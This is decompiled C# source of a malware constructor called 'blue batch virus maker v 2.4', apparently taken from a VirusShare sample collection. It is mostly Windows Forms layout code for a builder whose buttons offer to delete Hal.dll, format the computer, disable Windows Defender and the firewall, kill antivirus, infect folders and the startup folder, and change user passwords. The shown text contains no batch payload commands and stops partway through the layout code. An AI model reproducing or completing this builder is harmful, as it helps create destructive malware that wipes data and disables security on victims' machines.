// Decompiled with JetBrains decompiler // Type: blue_batch_virus_maker_v_2._4.batch_maker // Assembly: blue batch virus maker v 2.4, Version=, Culture=neutral, PublicKeyToken=null // MVID: 2DAFA7DD-2FE8-4FC2-9A4A-71538C37F4F9 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Constructor.Win32.BAT.q-08ee2f8c3aa3c7eab228bd2f1b4a63e07fd7671a3929619d4d3486bad87f8200.exe using blue_batch_virus_maker_v_2._4.My; using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using System; using System.Collections.Generic; using System.ComponentModel; using System.Diagnostics; using System.Drawing; using System.Net; using System.Runtime.CompilerServices; using System.Windows.Forms; namespace blue_batch_virus_maker_v_2._4 { [DesignerGenerated] public class batch_maker : Form { private static List __ENCList = new List(); private IContainer components; [AccessedThroughProperty("RichTextBox1")] private RichTextBox _RichTextBox1; [AccessedThroughProperty("Button1")] private Button _Button1; [AccessedThroughProperty("Button2")] private Button _Button2; [AccessedThroughProperty("Button3")] private Button _Button3; [AccessedThroughProperty("Button4")] private Button _Button4; [AccessedThroughProperty("GroupBox1")] private GroupBox _GroupBox1; [AccessedThroughProperty("Button9")] private Button _Button9; [AccessedThroughProperty("Button7")] private Button _Button7; [AccessedThroughProperty("Button6")] private Button _Button6; [AccessedThroughProperty("Button5")] private Button _Button5; [AccessedThroughProperty("Button10")] private Button _Button10; [AccessedThroughProperty("Button11")] private Button _Button11; [AccessedThroughProperty("Button12")] private Button _Button12; [AccessedThroughProperty("Button13")] private Button _Button13; [AccessedThroughProperty("Button14")] private Button _Button14; [AccessedThroughProperty("Button15")] private Button _Button15; [AccessedThroughProperty("GroupBox2")] private GroupBox _GroupBox2; [AccessedThroughProperty("Button16")] private Button _Button16; [AccessedThroughProperty("GroupBox3")] private GroupBox _GroupBox3; [AccessedThroughProperty("Button21")] private Button _Button21; [AccessedThroughProperty("Button20")] private Button _Button20; [AccessedThroughProperty("Button19")] private Button _Button19; [AccessedThroughProperty("Button18")] private Button _Button18; [AccessedThroughProperty("Button23")] private Button _Button23; [AccessedThroughProperty("Button22")] private Button _Button22; [AccessedThroughProperty("GroupBox4")] private GroupBox _GroupBox4; [AccessedThroughProperty("Button29")] private Button _Button29; [AccessedThroughProperty("Button28")] private Button _Button28; [AccessedThroughProperty("Button27")] private Button _Button27; [AccessedThroughProperty("Button26")] private Button _Button26; [AccessedThroughProperty("Button25")] private Button _Button25; [AccessedThroughProperty("Button24")] private Button _Button24; [AccessedThroughProperty("RichTextBox2")] private RichTextBox _RichTextBox2; [AccessedThroughProperty("Button30")] private Button _Button30; [AccessedThroughProperty("Button31")] private Button _Button31; [AccessedThroughProperty("Button40")] private Button _Button40; [AccessedThroughProperty("Button41")] private Button _Button41; [AccessedThroughProperty("Button38")] private Button _Button38; [AccessedThroughProperty("Button39")] private Button _Button39; [AccessedThroughProperty("Button37")] private Button _Button37; [AccessedThroughProperty("Button36")] private Button _Button36; [AccessedThroughProperty("Button34")] private Button _Button34; [AccessedThroughProperty("Button35")] private Button _Button35; [AccessedThroughProperty("Button33")] private Button _Button33; [AccessedThroughProperty("Button32")] private Button _Button32; [AccessedThroughProperty("Button17")] private Button _Button17; [AccessedThroughProperty("Button57")] private Button _Button57; [AccessedThroughProperty("Button58")] private Button _Button58; [AccessedThroughProperty("Button59")] private Button _Button59; [AccessedThroughProperty("Button60")] private Button _Button60; [AccessedThroughProperty("Button61")] private Button _Button61; [AccessedThroughProperty("Button42")] private Button _Button42; [AccessedThroughProperty("Button43")] private Button _Button43; [AccessedThroughProperty("Button44")] private Button _Button44; [AccessedThroughProperty("Button45")] private Button _Button45; [AccessedThroughProperty("Button46")] private Button _Button46; [AccessedThroughProperty("Button47")] private Button _Button47; [AccessedThroughProperty("Button48")] private Button _Button48; [AccessedThroughProperty("Button49")] private Button _Button49; [AccessedThroughProperty("Button50")] private Button _Button50; [AccessedThroughProperty("Button51")] private Button _Button51; [AccessedThroughProperty("Button52")] private Button _Button52; [AccessedThroughProperty("Button53")] private Button _Button53; [AccessedThroughProperty("Button54")] private Button _Button54; [AccessedThroughProperty("Button55")] private Button _Button55; [AccessedThroughProperty("Button56")] private Button _Button56; [AccessedThroughProperty("CheckBox2")] private CheckBox _CheckBox2; [AccessedThroughProperty("Button62")] private Button _Button62; [AccessedThroughProperty("Button8")] private Button _Button8; [AccessedThroughProperty("Label1")] private Label _Label1; [AccessedThroughProperty("Timer1")] private System.Windows.Forms.Timer _Timer1; [AccessedThroughProperty("CheckBox1")] private CheckBox _CheckBox1; [AccessedThroughProperty("Button63")] private Button _Button63; [AccessedThroughProperty("Button67")] private Button _Button67; [AccessedThroughProperty("Button68")] private Button _Button68; [AccessedThroughProperty("Button70")] private Button _Button70; [AccessedThroughProperty("Button73")] private Button _Button73; [AccessedThroughProperty("Button71")] private Button _Button71; [AccessedThroughProperty("CheckBox3")] private CheckBox _CheckBox3; [AccessedThroughProperty("Button64")] private Button _Button64; [AccessedThroughProperty("Panel1")] private Panel _Panel1; [AccessedThroughProperty("TextBox1")] private TextBox _TextBox1; [AccessedThroughProperty("Label4")] private Label _Label4; [AccessedThroughProperty("Label5")] private Label _Label5; [AccessedThroughProperty("Label6")] private Label _Label6; [AccessedThroughProperty("Button65")] private Button _Button65; [AccessedThroughProperty("Button66")] private Button _Button66; [AccessedThroughProperty("Label2")] private Label _Label2; [AccessedThroughProperty("Label3")] private Label _Label3; [DebuggerNonUserCode] static batch_maker() { } [DebuggerNonUserCode] public batch_maker() { this.Load += new EventHandler(this.Form1_Load); this.MouseEnter += new EventHandler(this.batch_maker_MouseEnter); batch_maker.__ENCAddToList((object) this); this.InitializeComponent(); } [DebuggerNonUserCode] private static void __ENCAddToList(object value) { lock (batch_maker.__ENCList) { if (batch_maker.__ENCList.Count == batch_maker.__ENCList.Capacity) { int index1 = 0; int num = checked (batch_maker.__ENCList.Count - 1); int index2 = 0; while (index2 <= num) { if (batch_maker.__ENCList[index2].IsAlive) { if (index2 != index1) batch_maker.__ENCList[index1] = batch_maker.__ENCList[index2]; checked { ++index1; } } checked { ++index2; } } batch_maker.__ENCList.RemoveRange(index1, checked (batch_maker.__ENCList.Count - index1)); batch_maker.__ENCList.Capacity = batch_maker.__ENCList.Count; } batch_maker.__ENCList.Add(new WeakReference(RuntimeHelpers.GetObjectValue(value))); } } [DebuggerNonUserCode] protected override void Dispose(bool disposing) { try { if (!disposing || this.components == null) return; this.components.Dispose(); } finally { base.Dispose(disposing); } } [DebuggerStepThrough] private void InitializeComponent() { this.components = (IContainer) new System.ComponentModel.Container(); ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof (batch_maker)); this.RichTextBox1 = new RichTextBox(); this.Button1 = new Button(); this.Button2 = new Button(); this.Button3 = new Button(); this.Button4 = new Button(); this.GroupBox1 = new GroupBox(); this.Button9 = new Button(); this.Button12 = new Button(); this.Button14 = new Button(); this.Button70 = new Button(); this.Button25 = new Button(); this.Button63 = new Button(); this.Button5 = new Button(); this.Button13 = new Button(); this.Button11 = new Button(); this.Button10 = new Button(); this.Button7 = new Button(); this.Button6 = new Button(); this.Button15 = new Button(); this.GroupBox2 = new GroupBox(); this.Button16 = new Button(); this.GroupBox3 = new GroupBox(); this.Button71 = new Button(); this.Button68 = new Button(); this.Button73 = new Button(); this.Button67 = new Button(); this.Button17 = new Button(); this.Button23 = new Button(); this.Button22 = new Button(); this.Button21 = new Button(); this.Button20 = new Button(); this.Button19 = new Button(); this.Button18 = new Button(); this.GroupBox4 = new GroupBox(); this.Button8 = new Button(); this.Button57 = new Button(); this.Button58 = new Button(); this.Button59 = new Button(); this.Button60 = new Button(); this.Button61 = new Button(); this.Button42 = new Button(); this.Button43 = new Button(); this.Button44 = new Button(); this.Button45 = new Button(); this.Button46 = new Button(); this.Button47 = new Button(); this.Button48 = new Button(); this.Button49 = new Button(); this.Button50 = new Button(); this.Button51 = new Button(); this.Button52 = new Button(); this.Button53 = new Button(); this.Button54 = new Button(); this.Button55 = new Button(); this.Button56 = new Button(); this.Button40 = new Button(); this.Button41 = new Button(); this.Button38 = new Button(); this.Button39 = new Button(); this.Button37 = new Button(); this.Button36 = new Button(); this.Button34 = new Button(); this.Button35 = new Button(); this.Button33 = new Button(); this.Button32 = new Button(); this.Button31 = new Button(); this.Button29 = new Button(); this.Button28 = new Button(); this.Button27 = new Button(); this.Button26 = new Button(); this.Button24 = new Button(); this.RichTextBox2 = new RichTextBox(); this.Button30 = new Button(); this.CheckBox2 = new CheckBox(); this.Button62 = new Button(); this.Label1 = new Label(); this.Timer1 = new System.Windows.Forms.Timer(this.components); this.CheckBox1 = new CheckBox(); this.CheckBox3 = new CheckBox(); this.Button64 = new Button(); this.Panel1 = new Panel(); this.TextBox1 = new TextBox(); this.Label4 = new Label(); this.Label5 = new Label(); this.Label6 = new Label(); this.Button65 = new Button(); this.Button66 = new Button(); this.Label2 = new Label(); this.Label3 = new Label(); this.GroupBox1.SuspendLayout(); this.GroupBox2.SuspendLayout(); this.GroupBox3.SuspendLayout(); this.GroupBox4.SuspendLayout(); this.Panel1.SuspendLayout(); this.SuspendLayout(); this.RichTextBox1.BackColor = Color.Black; this.RichTextBox1.ForeColor = Color.Lime; RichTextBox richTextBox1_1 = this.RichTextBox1; Point point1 = new Point(8, 99); Point point2 = point1; richTextBox1_1.Location = point2; this.RichTextBox1.Name = "RichTextBox1"; RichTextBox richTextBox1_2 = this.RichTextBox1; Size size1 = new Size(339, 347); Size size2 = size1; richTextBox1_2.Size = size2; this.RichTextBox1.TabIndex = 0; this.RichTextBox1.Text = "@echo off\nrem ---------------------------------"; this.Button1.BackColor = Color.Black; this.Button1.ForeColor = Color.Lime; Button button1_1 = this.Button1; point1 = new Point(8, 495); Point point3 = point1; button1_1.Location = point3; this.Button1.Name = "Button1"; Button button1_2 = this.Button1; size1 = new Size(171, 23); Size size3 = size1; button1_2.Size = size3; this.Button1.TabIndex = 2; this.Button1.Text = "Save As .Bat"; this.Button1.UseVisualStyleBackColor = false; this.Button2.BackColor = Color.Black; this.Button2.ForeColor = Color.Lime; Button button2_1 = this.Button2; point1 = new Point(8, 472); Point point4 = point1; button2_1.Location = point4; this.Button2.Name = "Button2"; Button button2_2 = this.Button2; size1 = new Size(78, 23); Size size4 = size1; button2_2.Size = size4; this.Button2.TabIndex = 3; this.Button2.Text = "@echo off"; this.Button2.UseVisualStyleBackColor = false; this.Button3.BackColor = Color.Black; this.Button3.ForeColor = Color.Lime; Button button3_1 = this.Button3; point1 = new Point(271, 472); Point point5 = point1; button3_1.Location = point5; this.Button3.Name = "Button3"; Button button3_2 = this.Button3; size1 = new Size(78, 23); Size size5 = size1; button3_2.Size = size5; this.Button3.TabIndex = 4; this.Button3.Text = "Start over"; this.Button3.UseVisualStyleBackColor = false; this.Button4.BackColor = Color.Black; this.Button4.ForeColor = Color.Lime; Button button4_1 = this.Button4; point1 = new Point(92, 472); Point point6 = point1; button4_1.Location = point6; this.Button4.Name = "Button4"; Button button4_2 = this.Button4; size1 = new Size(169, 23); Size size6 = size1; button4_2.Size = size6; this.Button4.TabIndex = 5; this.Button4.Text = "More"; this.Button4.UseVisualStyleBackColor = false; this.GroupBox1.BackColor = Color.Black; this.GroupBox1.Controls.Add((Control) this.Button9); this.GroupBox1.Controls.Add((Control) this.Button12); this.GroupBox1.Controls.Add((Control) this.Button14); this.GroupBox1.Controls.Add((Control) this.Button70); this.GroupBox1.Controls.Add((Control) this.Button25); this.GroupBox1.ForeColor = Color.Lime; GroupBox groupBox1_1 = this.GroupBox1; point1 = new Point(353, 41); Point point7 = point1; groupBox1_1.Location = point7; this.GroupBox1.Name = "GroupBox1"; GroupBox groupBox1_2 = this.GroupBox1; size1 = new Size(161, 159); Size size7 = size1; groupBox1_2.Size = size7; this.GroupBox1.TabIndex = 6; this.GroupBox1.TabStop = false; this.GroupBox1.Text = "stealth / fun"; this.Button9.BackColor = Color.Black; Button button9_1 = this.Button9; point1 = new Point(10, 98); Point point8 = point1; button9_1.Location = point8; this.Button9.Name = "Button9"; Button button9_2 = this.Button9; size1 = new Size(145, 23); Size size8 = size1; button9_2.Size = size8; this.Button9.TabIndex = 4; this.Button9.Text = "Change User password"; this.Button9.UseVisualStyleBackColor = false; this.Button12.BackColor = Color.Black; Button button12_1 = this.Button12; point1 = new Point(10, 40); Point point9 = point1; button12_1.Location = point9; this.Button12.Name = "Button12"; Button button12_2 = this.Button12; size1 = new Size(145, 23); Size size9 = size1; button12_2.Size = size9; this.Button12.TabIndex = 7; this.Button12.Text = "Hide virus file"; this.Button12.UseVisualStyleBackColor = false; this.Button14.BackColor = Color.Black; Button button14_1 = this.Button14; point1 = new Point(10, 69); Point point10 = point1; button14_1.Location = point10; this.Button14.Name = "Button14"; Button button14_2 = this.Button14; size1 = new Size(145, 23); Size size10 = size1; button14_2.Size = size10; this.Button14.TabIndex = 9; this.Button14.Text = "Self Destruct"; this.Button14.UseVisualStyleBackColor = false; this.Button70.BackColor = Color.Black; Button button70_1 = this.Button70; point1 = new Point(10, (int) sbyte.MaxValue); Point point11 = point1; button70_1.Location = point11; this.Button70.Name = "Button70"; Button button70_2 = this.Button70; size1 = new Size(145, 23); Size size11 = size1; button70_2.Size = size11; this.Button70.TabIndex = 0; this.Button70.Text = "Disable Taskmanager"; this.Button70.UseVisualStyleBackColor = false; this.Button25.BackColor = Color.Black; this.Button25.ForeColor = Color.Lime; Button button25_1 = this.Button25; point1 = new Point(10, 11); Point point12 = point1; button25_1.Location = point12; this.Button25.Name = "Button25"; Button button25_2 = this.Button25; size1 = new Size(145, 23); Size size12 = size1; button25_2.Size = size12; this.Button25.TabIndex = 12; this.Button25.Text = "Open CD in and out"; this.Button25.UseVisualStyleBackColor = false; this.Button63.BackColor = Color.Black; Button button63_1 = this.Button63; point1 = new Point(6, 128); Point point13 = point1; button63_1.Location = point13; this.Button63.Name = "Button63"; Button button63_2 = this.Button63; size1 = new Size(141, 23); Size size13 = size1; button63_2.Size = size13; this.Button63.TabIndex = 0; this.Button63.Text = "Infect Start up folder"; this.Button63.UseVisualStyleBackColor = false; this.Button5.BackColor = Color.Black; Button button5_1 = this.Button5; point1 = new Point(6, 41); Point point14 = point1; button5_1.Location = point14; this.Button5.Name = "Button5"; Button button5_2 = this.Button5; size1 = new Size(141, 23); Size size14 = size1; button5_2.Size = size14; this.Button5.TabIndex = 0; this.Button5.Text = "self destruct"; this.Button5.UseVisualStyleBackColor = false; this.Button13.BackColor = Color.Black; Button button13_1 = this.Button13; point1 = new Point(6, 19); Point point15 = point1; button13_1.Location = point15; this.Button13.Name = "Button13"; Button button13_2 = this.Button13; size1 = new Size(141, 23); Size size15 = size1; button13_2.Size = size15; this.Button13.TabIndex = 8; this.Button13.Text = "Disable Window Defender"; this.Button13.UseVisualStyleBackColor = false; this.Button11.BackColor = Color.Black; Button button11_1 = this.Button11; point1 = new Point(14, 19); Point point16 = point1; button11_1.Location = point16; this.Button11.Name = "Button11"; Button button11_2 = this.Button11; size1 = new Size(145, 23); Size size16 = size1; button11_2.Size = size16; this.Button11.TabIndex = 6; this.Button11.Text = "Delete Hal.dll"; this.Button11.UseVisualStyleBackColor = false; this.Button10.BackColor = Color.Black; this.Button10.ForeColor = Color.Lime; Button button10_1 = this.Button10; point1 = new Point(6, 70); Point point17 = point1; button10_1.Location = point17; this.Button10.Name = "Button10"; Button button10_2 = this.Button10; size1 = new Size(141, 23); Size size17 = size1; button10_2.Size = size17; this.Button10.TabIndex = 5; this.Button10.Text = "change timer to 12:00"; this.Button10.UseVisualStyleBackColor = false; this.Button7.BackColor = Color.Black; Button button7_1 = this.Button7; point1 = new Point(6, 99); Point point18 = point1; button7_1.Location = point18; this.Button7.Name = "Button7"; Button button7_2 = this.Button7; size1 = new Size(141, 23); Size size18 = size1; button7_2.Size = size18; this.Button7.TabIndex = 2; this.Button7.Text = "Clear Screen"; this.Button7.UseVisualStyleBackColor = false; this.Button6.BackColor = Color.Black; this.Button6.ForeColor = Color.Lime; Button button6_1 = this.Button6; point1 = new Point(6, 12); Point point19 = point1; button6_1.Location = point19; this.Button6.Name = "Button6"; Button button6_2 = this.Button6; size1 = new Size(141, 23); Size size19 = size1; button6_2.Size = size19; this.Button6.TabIndex = 1; this.Button6.Text = "Disable mouse"; this.Button6.UseVisualStyleBackColor = false; this.Button15.BackColor = Color.Black; Button button15_1 = this.Button15; point1 = new Point(14, 48); Point point20 = point1; button15_1.Location = point20; this.Button15.Name = "Button15"; Button button15_2 = this.Button15; size1 = new Size(145, 23); Size size20 = size1; button15_2.Size = size20; this.Button15.TabIndex = 10; this.Button15.Text = "Format Computer"; this.Button15.UseVisualStyleBackColor = false; this.GroupBox2.BackColor = Color.Black; this.GroupBox2.Controls.Add((Control) this.Button6); this.GroupBox2.Controls.Add((Control) this.Button10); this.GroupBox2.Controls.Add((Control) this.Button7); this.GroupBox2.Controls.Add((Control) this.Button63); this.GroupBox2.Controls.Add((Control) this.Button5); this.GroupBox2.ForeColor = Color.Lime; GroupBox groupBox2_1 = this.GroupBox2; point1 = new Point(522, 37); Point point21 = point1; groupBox2_1.Location = point21; this.GroupBox2.Name = "GroupBox2"; GroupBox groupBox2_2 = this.GroupBox2; size1 = new Size(153, 163); Size size21 = size1; groupBox2_2.Size = size21; this.GroupBox2.TabIndex = 11; this.GroupBox2.TabStop = false; this.GroupBox2.Text = "Fun stuff"; this.Button16.BackColor = Color.Black; this.Button16.ForeColor = Color.Lime; Button button16_1 = this.Button16; point1 = new Point(14, 106); Point point22 = point1; button16_1.Location = point22; this.Button16.Name = "Button16"; Button button16_2 = this.Button16; size1 = new Size(145, 23); Size size22 = size1; button16_2.Size = size22; this.Button16.TabIndex = 4; this.Button16.Text = "Disable Internet"; this.Button16.UseVisualStyleBackColor = false; this.GroupBox3.BackColor = Color.Black; this.GroupBox3.Controls.Add((Control) this.Button71); this.GroupBox3.Controls.Add((Control) this.Button68); this.GroupBox3.Controls.Add((Control) this.Button73); this.GroupBox3.Controls.Add((Control) this.Button67); this.GroupBox3.Controls.Add((Control) this.Button17); this.GroupBox3.Controls.Add((Control) this.Button23); this.GroupBox3.Controls.Add((Control) this.Button22); this.GroupBox3.Controls.Add((Control) this.Button13); this.GroupBox3.Controls.Add((Control) this.Button21); this.GroupBox3.Controls.Add((Control) this.Button20); this.GroupBox3.Controls.Add((Control) this.Button19); this.GroupBox3.Controls.Add((Control) this.Button18); this.GroupBox3.ForeColor = Color.Lime; GroupBox groupBox3_1 = this.GroupBox3; point1 = new Point(681, 22); Point point23 = point1; groupBox3_1.Location = point23; this.GroupBox3.Name = "GroupBox3"; GroupBox groupBox3_2 = this.GroupBox3; size1 = new Size(265, 178); Size size23 = size1; groupBox3_2.Size = size23; this.GroupBox3.TabIndex = 12; this.GroupBox3.TabStop = false; this.GroupBox3.Text = "Kill programs "; this.Button71.BackColor = Color.Black; Button button71_1 = this.Button71; point1 = new Point(153, 131); Point point24 = point1; button71_1.Location = point24; this.Button71.Name = "Button71"; Button button71_2 = this.Button71; size1 = new Size(106, 23); Size size24 = size1; button71_2.Size = size24; this.Button71.TabIndex = 1; this.Button71.Text = "Temp kill antivirus"; this.Button71.UseVisualStyleBackColor = false; this.Button68.BackColor = Color.Black; Button button68_1 = this.Button68; point1 = new Point(153, 155); Point point25 = point1; button68_1.Location = point25; this.Button68.Name = "Button68"; Button button68_2 = this.Button68; size1 = new Size(106, 23); Size size25 = size1; button68_2.Size = size25; this.Button68.TabIndex = 25; this.Button68.Text = "Infect All Folders"; this.Button68.UseVisualStyleBackColor = false; this.Button73.BackColor = Color.Black; Button button73_1 = this.Button73; point1 = new Point(6, 131); Point point26 = point1; button73_1.Location = point26; this.Button73.Name = "Button73"; Button button73_2 = this.Button73; size1 = new Size(141, 23); Size size26 = size1; button73_2.Size = size26; this.Button73.TabIndex = 3; this.Button73.Text = "Trick kill firewall"; this.Button73.UseVisualStyleBackColor = false; this.Button67.BackColor = Color.Black; Button button67_1 = this.Button67; point1 = new Point(7, 155); Point point27 = point1; button67_1.Location = point27; this.Button67.Name = "Button67"; Button button67_2 = this.Button67; size1 = new Size(140, 23); Size size27 = size1; button67_2.Size = size27; this.Button67.TabIndex = 24; this.Button67.Text = "Infect CMD"; this.Button67.UseVisualStyleBackColor = false; this.Button17.BackColor = Color.Black; this.Button17.ForeColor = Color.Lime; Button button17_1 = this.Button17; point1 = new Point(6, 106); Point point28 = point1; button17_1.Location = point28; this.Button17.Name = "Button17"; Button button17_2 = this.Button17; size1 = new Size(141, 23); Size size28 = size1; button17_2.Size = size28; this.Button17.TabIndex = 9; this.Button17.Text = " Kill ALG.exe"; this.Button17.UseVisualStyleBackColor = false; this.Button23.BackColor = Color.Black; this.Button23.ForeColor = Color.Lime; Button button23_1 = this.Button23; point1 = new Point(153, 19); Point point29 = point1; button23_1.Location = point29; this.Button23.Name = "Button23"; Button button23_2 = this.Button23; size1 = new Size(106, 23); Size size29 = size1; button23_2.Size = size29; this.Button23.TabIndex = 8; this.Button23.Text = "Kill JPS"; this.Button23.UseVisualStyleBackColor = false; this.Button22.BackColor = Color.Black; this.Button22.ForeColor = Color.Lime; Button button22_1 = this.Button22; point1 = new Point(153, 77); Point point30 = point1; button22_1.Location = point30; this.Button22.Name = "Button22"; Button button22_2 = this.Button22; size1 = new Size(106, 23); Size size30 = size1; button22_2.Size = size30; this.Button22.TabIndex = 4; this.Button22.Text = "Kill Notepad"; this.Button22.UseVisualStyleBackColor = false; this.Button21.BackColor = Color.Black; this.Button21.ForeColor = Color.Lime; Button button21_1 = this.Button21; point1 = new Point(6, 77); Point point31 = point1; button21_1.Location = point31; this.Button21.Name = "Button21"; Button button21_2 = this.Button21; size1 = new Size(141, 23); Size size31 = size1; button21_2.Size = size31; this.Button21.TabIndex = 7; this.Button21.Text = " Kill Microsoft Access"; this.Button21.UseVisualStyleBackColor = false; this.Button20.BackColor = Color.Black; this.Button20.ForeColor = Color.Lime; Button button20_1 = this.Button20; point1 = new Point(153, 48); Point point32 = point1; button20_1.Location = point32; this.Button20.Name = "Button20"; Button button20_2 = this.Button20; size1 = new Size(106, 23); Size size32 = size1; button20_2.Size = size32; this.Button20.TabIndex = 6; this.Button20.Text = "Kill Calculator"; this.Button20.UseVisualStyleBackColor = false; this.Button19.BackColor = Color.Black; this.Button19.ForeColor = Color.Lime; Button button19_1 = this.Button19; point1 = new Point(6, 48); Point point33 = point1; button19_1.Location = point33; this.Button19.Name = "Button19"; Button button19_2 = this.Button19; size1 = new Size(141, 23); Size size33 = size1; button19_2.Size = size33; this.Button19.TabIndex = 5; this.Button19.Text = "Kill msn messenger"; this.Button19.UseVisualStyleBackColor = false; this.Button18.BackColor = Color.Black; this.Button18.ForeColor = Color.Lime; Button button18_1 = this.Button18; point1 = new Point(153, 106); Point point34 = point1; button18_1.Location = point34; this.Button18.Name = "Button18"; Button button18_2 = this.Button18; size1 = new Size(106, 23); Size size34 = size1; button18_2.Size = size34; this.Button18.TabIndex = 4; this.Button18.Text = "Kill word"; this.Button18.UseVisualStyleBackColor = false; this.GroupBox4.BackColor = Color.Black; this.GroupBox4.Controls.Add((Control) this.Button8); this.GroupBox4.Controls.Add((Control) this.Button57); this.GroupBox4.Controls.Add((Control) this.Button58); this.GroupBox4.Controls.Add((Control) this.Button59); this.GroupBox4.Controls.Add((Control) this.Button60); this.GroupBox4.Controls.Add((Control) this.Button61); this.GroupBox4.Controls.Add((Control) this.Button42); this.GroupBox4.Controls.Add((Control) this.Button43); this.GroupBox4.Controls.Add((Control) this.Button44); this.GroupBox4.Controls.Add((Control) this.Button45); this.GroupBox4.Controls.Add((Control) this.Button46); this.GroupBox4.Controls.Add((Control) this.Button47); this.GroupBox4.Controls.Add((Control) this.Button48); this.GroupBox4.Controls.Add((Control) this.Button49); this.GroupBox4.Controls.Add((Control) this.Button50); this.GroupBox4.Controls.Add((Control) this.Button51); this.GroupBox4.Controls.Add((Control) this.Button52); this.GroupBox4.Controls.Add((Control) this.Button53); this.GroupBox4.Controls.Add((Control) this.Button54); this.GroupBox4.Controls.Add((Control) this.Button55); this.GroupBox4.Controls.Add((Control) this.Button56); this.GroupBox4.Controls.Add((Control) this.Button40); this.GroupBox4.Controls.Add((Control) this.Button41); this.GroupBox4.Controls.Add((Control) this.Button38); this.GroupBox4.Controls.Add((Control) this.Button39); this.GroupBox4.Controls.Add((Control) this.Button37); this.GroupBox4.Controls.Add((Control) this.Button36); this.GroupBox4.Controls.Add((Control) this.Button34); this.GroupBox4.Controls.Add((Control) this.Button35); this.GroupBox4.Controls.Add((Control) this.Button33); this.GroupBox4.Controls.Add((Control) this.Button32); this.GroupBox4.Controls.Add((Control) this.Button31); this.GroupBox4.Controls.Add((Control) this.Button29); this.GroupBox4.Controls.Add((Control) this.Button28); this.GroupBox4.Controls.Add((Control) this.Button27); this.GroupBox4.Controls.Add((Control) this.Button26); this.GroupBox4.Controls.Add((Control) this.Button24); this.GroupBox4.Controls.Add((Control) this.Button16); this.GroupBox4.Controls.Add((Control) this.Button11); this.GroupBox4.Controls.Add((Control) this.Button15); this.GroupBox4.ForeColor = Color.Lime; GroupBox groupBox4_1 = this.GroupBox4; point1 = new Point(355, 206); Point point35 = point1; groupBox4_1.Location = point35; this.GroupBox4.Name = "GroupBox4"; GroupBox groupBox4_2 = this.GroupBox4; size1 = new Size(591, 312); Size size35 = size1; groupBox4_2.Size = size35; this.GroupBox4.TabIndex = 13; this.GroupBox4.TabStop = false; this.GroupBox4.Text = "Delete Stuff"; this.Button8.BackColor = Color.Black; this.Button8.ForeColor = Color.Lime; Button button8_1 = this.Button8; point1 = new Point(14, 77); Point point36 = point1; button8_1.Location = point36; this.Button8.Name = "Button8"; Button button8_2 = this.Button8; size1 = new Size(145, 23); Size size36 = size1; button8_2.Size = size36; this.Button8.TabIndex = 53; this.Button8.Text = "Disable Run32.dll"; this.Button8.UseVisualStyleBackColor = false; this.Button57.BackColor = Color.Black; this.Button57.ForeColor = Color.Lime; Button button57_1 = this.Button57; point1 = new Point(308, 133); Point point37 = point1; button57_1.Location = point37; this.Button57.Name = "Button57"; Button button57_2 = this.Button57; size1 = new Size(145, 23); Size size37 = size1; button57_2.Size = size37; this.Button57.TabIndex = 52; this.Button57.Text = "Delete all .rc"; this.Button57.UseVisualStyleBackColor = false; this.Button58.BackColor = Color.Black; this.Button58.ForeColor = Color.Lime; Button button58_1 = this.Button58; point1 = new Point(308, 104); Point point38 = point1; button58_1.Location = point38; this.Button58.Name = "Button58"; Button button58_2 = this.Button58; size1 = new Size(145, 23); Size size38 = size1; button58_2.Size = size38; this.Button58.TabIndex = 51; this.Button58.Text = "Delete all .dev"; this.Button58.UseVisualStyleBackColor = false; this.Button59.BackColor = Color.Black; this.Button59.ForeColor = Color.Lime; Button button59_1 = this.Button59; point1 = new Point(308, 75); Point point39 = point1; button59_1.Location = point39; this.Button59.Name = "Button59"; Button button59_2 = this.Button59; size1 = new Size(145, 23); Size size39 = size1; button59_2.Size = size39; this.Button59.TabIndex = 50; this.Button59.Text = "Delete all .cpp"; this.Button59.UseVisualStyleBackColor = false; this.Button60.BackColor = Color.Black; this.Button60.ForeColor = Color.Lime; Button button60_1 = this.Button60; point1 = new Point(308, 46); Point point40 = point1; button60_1.Location = point40; this.Button60.Name = "Button60"; Button button60_2 = this.Button60; size1 = new Size(145, 23); Size size40 = size1; button60_2.Size = size40; this.Button60.TabIndex = 49; this.Button60.Text = "Delete all .scr"; this.Button60.UseVisualStyleBackColor = false; this.Button61.BackColor = Color.Black; this.Button61.ForeColor = Color.Lime; Button button61_1 = this.Button61; point1 = new Point(308, 19); Point point41 = point1; button61_1.Location = point41; this.Button61.Name = "Button61"; Button button61_2 = this.Button61; size1 = new Size(145, 23); Size size41 = size1; button61_2.Size = size41; this.Button61.TabIndex = 48; this.Button61.Text = "Delete All .com"; this.Button61.UseVisualStyleBackColor = false; this.Button42.BackColor = Color.Black; Button button42_1 = this.Button42; point1 = new Point(459, 278); Point point42 = point1; button42_1.Location = point42; this.Button42.Name = "Button42"; Button button42_2 = this.Button42; size1 = new Size(126, 23); Size size42 = size1; button42_2.Size = size42; this.Button42.TabIndex = 47; this.Button42.Text = "Delete All .DLL"; this.Button42.UseVisualStyleBackColor = false; this.Button43.BackColor = Color.Black; Button button43_1 = this.Button43; point1 = new Point(459, 249); Point point43 = point1; button43_1.Location = point43; this.Button43.Name = "Button43"; Button button43_2 = this.Button43; size1 = new Size(126, 23); Size size43 = size1; button43_2.Size = size43; this.Button43.TabIndex = 46; this.Button43.Text = "Delete All .avi"; this.Button43.UseVisualStyleBackColor = false; this.Button44.BackColor = Color.Black; Button button44_1 = this.Button44; point1 = new Point(459, 222); Point point44 = point1; button44_1.Location = point44; this.Button44.Name = "Button44"; Button button44_2 = this.Button44; size1 = new Size(126, 23); Size size44 = size1; button44_2.Size = size44; this.Button44.TabIndex = 45; this.Button44.Text = "Delete All .file"; this.Button44.UseVisualStyleBackColor = false; this.Button45.BackColor = Color.Black; Button button45_1 = this.Button45; point1 = new Point(459, 193); Point point45 = point1; button45_1.Location = point45; this.Button45.Name = "Button45"; Button button45_2 = this.Button45; size1 = new Size(126, 23); Size size45 = size1; button45_2.Size = size45; this.Button45.TabIndex = 44; this.Button45.Text = "Delete All .tmp"; this.Button45.UseVisualStyleBackColor = false; this.Button46.BackColor = Color.Black; Button button46_1 = this.Button46; point1 = new Point(459, 164); Point point46 = point1; button46_1.Location = point46; this.Button46.Name = "Button46"; Button button46_2 = this.Button46; size1 = new Size(126, 23); Size size46 = size1; button46_2.Size = size46; this.Button46.TabIndex = 43; this.Button46.Text = "Delete All .rtf"; this.Button46.UseVisualStyleBackColor = false; 